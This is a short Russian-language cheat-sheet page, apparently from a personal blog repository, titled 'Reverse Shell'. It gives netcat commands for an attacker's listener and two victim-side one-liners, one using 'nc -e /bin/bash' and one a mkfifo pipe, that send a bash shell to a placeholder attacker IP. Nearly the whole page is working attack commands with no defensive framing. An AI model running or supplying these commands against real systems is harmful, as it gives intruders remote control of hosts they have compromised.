mirror of
https://github.com/fruworg/fruworg.github.io.git
synced 2024-11-16 17:37:17 +03:00
472 B
472 B
title | description | date | tags | |||
---|---|---|---|---|---|---|
Reverse Shell | Используя Traditional и OpenBSD Netcat | 2022-12-09T15:02:00+05:00 |
|
Машина атакующего
nc -lvp <port>
Машина жертвы (Traditional Netcat)
nc <attacker-ip> <port> -e /bin/bash
Машина жертвы (OpenBSD Netcat)
mkfifo /tmp/rev; nc <attacker-ip> <port> < /tmp/rev | /bin/bash 2>&1 | tee /tmp/rev > /dev/null